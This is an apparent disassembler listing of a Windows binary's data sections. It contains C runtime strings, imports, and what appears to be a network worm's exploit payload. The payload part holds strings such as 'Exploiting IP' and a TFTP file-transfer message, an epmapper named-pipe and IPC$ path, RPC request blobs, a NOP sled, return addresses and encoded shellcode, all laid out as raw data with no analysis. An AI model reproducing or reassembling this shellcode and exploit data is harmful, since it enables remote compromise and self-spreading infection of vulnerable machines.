db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_42863C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 10h
; char asc_41B990[]
asc_41B990 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 10h
dword_41B9D0 dd 0FFFFFFFFh, 4188C6h, 4188CAh ; DATA XREF: ___crtGetStringTypeA+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
; char VarName[]
VarName db 'TZ',0 ; DATA XREF: __tzset+A�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_41A481�o
align 4
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+AD�o
align 10h
dword_41BA70 dd 0FFFFFFFFh, 41AC12h, 41AC16h, 0FFFFFFFFh, 41AC81h, 41AC85h
; DATA XREF: ___crtCompareStringA+5�o
dd 1BC64h, 2 dup(0)
dd 1BCA8h, 1B1A0h, 1BAC4h, 2 dup(0)
dd 1C40Eh, 1B000h, 5 dup(0)
dd 1BFEAh, 1C3F4h, 1C3E2h, 1C3D0h, 1C3C0h, 1C3ACh, 1C39Ch
dd 1C38Ah, 1C378h, 1C36Ch, 1C35Eh, 1C34Eh, 1C33Ch, 1C322h
dd 1C30Ah, 1C2F0h, 1C2D6h, 1BCB4h, 1BCCAh, 1BCD2h, 1BCDEh
dd 1BCECh, 1BCF8h, 1BD0Ch, 1BD1Ah, 1BD2Ah, 1BD3Ah, 1BD50h
dd 1BD5Eh, 1BD76h, 1BD8Eh, 1BD9Eh, 1BDC6h, 1BDDEh, 1BDEEh
dd 1BE08h, 1BE24h, 1BE32h, 1BE44h, 1BE5Ah, 1BE6Ch, 1BE7Eh
dd 1BE8Ch, 1BEA2h, 1BEAEh, 1BEC6h, 1BEE0h, 1BEF0h, 1BF02h
dd 1BF14h, 1BF24h, 1BF36h, 1BF4Ah, 1BF5Ch, 1BF6Ch, 1BF7Ah
dd 1BF8Ch, 1BF9Ch, 1BFB2h, 1BFC0h, 1BFCEh, 1C000h, 1C010h
dd 1C026h, 1C03Ah, 1C04Eh, 1C062h, 1C06Eh, 1C07Ch, 1C08Ah
dd 1C0A0h, 1C0ACh, 1C0C2h, 1C0D2h, 1C0E4h, 1C0F0h, 1C106h
dd 1C116h, 1C128h, 1C136h, 1C14Eh, 1C160h, 1C170h, 1C18Ah
dd 1C1A6h, 1C1BCh, 1C1C8h, 1C1D4h, 1C1E2h, 1C1FCh, 1C20Ch
dd 1C21Eh, 1C230h, 1C23Eh, 1C24Ch, 1C25Ah, 1C268h, 1C278h
dd 1C288h, 1C298h, 1C2A4h, 1C2AEh, 1C2BAh, 0
dd 8000000Bh, 80000004h, 80000074h, 80000073h, 80000017h
dd 80000015h, 8000000Ah, 80000009h, 80000002h, 8000000Dh
dd 80000013h, 80000012h, 80000097h, 80000001h, 80000010h
dd 80000003h, 0
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
db 0E4h ; ä
db 1, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 296h
aSleep db 'Sleep',0
dw 218h
aReadfile_0 db 'ReadFile',0
align 2
db 1Bh,0
aClosehandle db 'CloseHandle',0
db 0DFh ; ß
db 2, 57h, 72h
aItefile db 'iteFile',0
db 0A7h ; §
db 2, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
a4 db '4',0
aCreatefilea db 'CreateFileA',0
dw 11Ah
aGetlasterror db 'GetLastError',0
align 2
aJ_0 db 'J',0
aCreatethread db 'CreateThread',0
align 2
dw 124h
aGetmodulefilen db 'GetModuleFileNameA',0
align 10h
db '~',0
aExitthread db 'ExitThread',0
align 2
dw 1C1h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aF db 'f',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 16Dh
aGettickcount db 'GetTickCount',0
align 2
dw 1ABh
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aU_0 db 'U',0
aDeletecritical db 'DeleteCriticalSection',0
dw 11Bh
aGetlocaltime db 'GetLocalTime',0
align 2
dw 206h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 7
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db '}',0
aExitprocess db 'ExitProcess',0
aD_2 db 'D',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 59h ; Y
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 16Eh
aGettimeformata db 'GetTimeFormatA',0
align 4
db 0FBh ; û
align 2
aGetdateformata db 'GetDateFormatA',0
align 2
dw 112h
aGetfilesize db 'GetFileSize',0
db 0Dh
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
aR_0 db '',0
aFindclose db 'FindClose',0
aK_0 db 'Š',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
aI_1 db '‰',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
aA_2 db '',0
aFindnextfilea db 'FindNextFileA',0
aF_0 db '”',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 26Ah
aSetfilepointer db 'SetFilePointer',0
align 4
db 0C2h ; Â
db 1, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 3Eh ; >
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 126h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aP_0 db '¯',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 93h ; “
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 8Ch ; Œ
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 2B0h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 0D6h ; Ö
db 1, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
a5 db '5',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 26Ch
aSetfiletime db 'SetFileTime',0
dd 65470114h, 6C694674h, 6D695465h, 800065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 268h
aSetfileattribu db 'SetFileAttributesA',0
align 10h
db 65h ; e
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 10h
db 0D2h ; Ò
db 2, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
db 'Î',0
aGetcomputernam db 'GetComputerNameA',0
align 2
dw 0F7h
aGetcurrentproc db 'GetCurrentProcess',0
dw 29Eh
aTerminateproce db 'TerminateProcess',0
align 2
dw 2FFh
aLstrcmpia db 'lstrcmpiA',0
dw 1EFh
aOpenprocess db 'OpenProcess',0
aW db 'W',0
aDeletefilea db 'DeleteFileA',0
dw 0F8h
aGetcurrentpr_0 db 'GetCurrentProcessId',0
db '(',0
aCopyfilea db 'CopyFileA',0
db 0CEh ; Î
db 2, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
a? db '?',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 29Fh
aTerminatethrea db 'TerminateThread',0
db 0DDh ; Ý
db 1, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 0Bh
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 1F9h
aPeeknamedpipe db 'PeekNamedPipe',0
aC_0 db 'c',0
aDuplicatehandl db 'DuplicateHandle',0
aC_1 db 'C',0
aCreatepipe db 'CreatePipe',0
align 2
dw 241h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 11Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 10h
db 75h ; u
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 0CCh ; Ì
db 2, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
db '¸',0
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 18Dh
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
dd 65480199h, 6C417061h, 636F6Ch, 6548019Fh, 72467061h
dd 6565h, 654801A2h, 65527061h, 6F6C6C41h, 1700063h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
dd 6547015Dh, 73795374h, 546D6574h, 656D69h, 65470150h
dd 61745374h, 70757472h, 6F666E49h, 0CA0041h, 43746547h
dd 616D6D6Fh, 694C646Eh, 41656Eh, 65470174h, 72655674h
dd 6E6F6973h, 19D0000h, 70616548h, 74736544h, 796F72h
dd 6548019Bh, 72437061h, 65746165h, 2BF0000h, 74726956h
dd 466C6175h, 656572h, 695602BBh, 61757472h, 6C6C416Ch
dd 636Fh, 434C01BFh, 5370614Dh, 6E697274h, 4167h, 434C01C0h
dd 5370614Dh, 6E697274h, 5767h, 654700BFh, 49504374h, 6F666Eh
dd 654700B9h, 50434174h, 1310000h, 4F746547h, 50434D45h
dd 2AD0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
db '²',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db '³',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 106h
aGetenvironment db 'GetEnvironmentStrings',0
dw 108h
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 6Dh ; m
db 2, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 152h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 115h
aGetfiletype db 'GetFileType',0
db 2Fh ; /
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 53h ; S
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 156h
aGetstringtypew db 'GetStringTypeW',0
align 4
db 7Ch ; |
db 2, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aK_1 db 'ª',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 61h ; a
db 2, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
db '!',0
aComparestringa db 'CompareStringA',0
align 2
db '"',0
aComparestringw db 'CompareStringW',0
align 4
db 62h ; b
db 2, 53h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 4
_rdata ends
; Section 3. (virtual address 0001D000)
; Virtual size : 00059B78 ( 367480.)
; Section size in file : 00059B78 ( 367480.)
; Offset to raw data for section: 0001D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41D000h
dword_41D000 dd 0 ; DATA XREF: __cinit+1F�o
dword_41D004 dd 0 ; DATA XREF: __cinit+1A�o
dword_41D008 dd 0 ; DATA XREF: __cinit+10�o
dd offset ___initmbctable
dd offset ___initstdio
dword_41D014 dd 0 ; DATA XREF: __cinit:loc_413921�o
dword_41D018 dd 0 ; DATA XREF: _doexit+65�o
dd offset ___endstdio
dword_41D020 dd 0 ; DATA XREF: _doexit:loc_4139C5�o
dword_41D024 dd 0 ; DATA XREF: _doexit+76�o
dword_41D028 dd 2 dup(0) ; DATA XREF: _doexit:loc_4139D6�o
dword_41D030 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: sub_4013EE+E1�o
; sub_4013EE+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41D07C dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40119B+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_41D3E0 dd 20h, 0 ; DATA XREF: sub_40119B+136�o
dd 20h, 5C005Ch, 0
off_41D3F4 dd offset dword_43005C ; DATA XREF: sub_40119B+15D�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
dd 0
dword_41D434 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40119B+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40119B+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_41D544 dd 10016C6h ; DATA XREF: sub_40119B+104�o
dword_41D548 dd 100139Dh ; DATA XREF: sub_40119B+FB�o
asc_41D54C: ; DATA XREF: sub_401000+1C�o
; sub_4010E3+16�o
unicode 0, <\\>,0
align 4
aIpc: ; DATA XREF: sub_401000+C�o
; sub_4010E3+B�o
unicode 0, <\IPC$>,0
; char aSExploitingIpS[]
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_4013EE+2E9�o
; .text:004019DC�o ...
align 4
; char aTftpFileTransf[]
aTftpFileTransf db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: sub_4013EE+29C�o
; .text:0040198F�o
align 4
; char Format[]
Format db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_4013EE+41�o
align 10h
aS: ; DATA XREF: .text:00401839�o
unicode 0, <è>,0
dd 31665800h, 388140C0h, 6D6F6364h, 7881F775h, 30786804h
dd 5EE7572h, 8, 9090E0FFh, 3Fh dup(90909090h), 9090h
dword_41D6E4 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: .text:00401919�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset dword_43005C
a123456111111_0:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
a127_0_0_1Ipc: ; DATA XREF: .text:00401858�o
unicode 0, <127.0.0.1\IPC$\>
dw 4545h
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 0E9h ; é
db 0F3h, 0FDh, 0FFh
db 0FFh
aEeeeeeeeeeeeee db 'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE',0
dword_41DD78 dd 7C54144Ch ; DATA XREF: .text:004018AB�o
dword_41DD7C dd 77A1B496h, 77EDA1F0h, 77A1AFA9h, 41414141h, 77FCC662h
; DATA XREF: .text:00401895�o
dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h, 0F1989999h, 4B9D999Bh
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
; char Str[]
Str db 'ë' ; DATA XREF: sub_401B98+156�o
; sub_401B98+212�o
db 10h, 5Ah, 4Ah
dd 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh, 70FFFFFFh
dd 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h, 0D9123485h
dd 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h, 8DD71262h
dd 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h, 0C6C091EDh
dd 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh, 589A7848h
dd 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh, 125A9A99h
dd 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh, 0CB945F1Ah
dd 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h
dd 669BF398h, 411275CEh, 999B9E5Eh
dword_41DF80 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401B98+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_41E068 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401FD7+76�o
dd 0FEFF0000h, 0
dd 2006200h
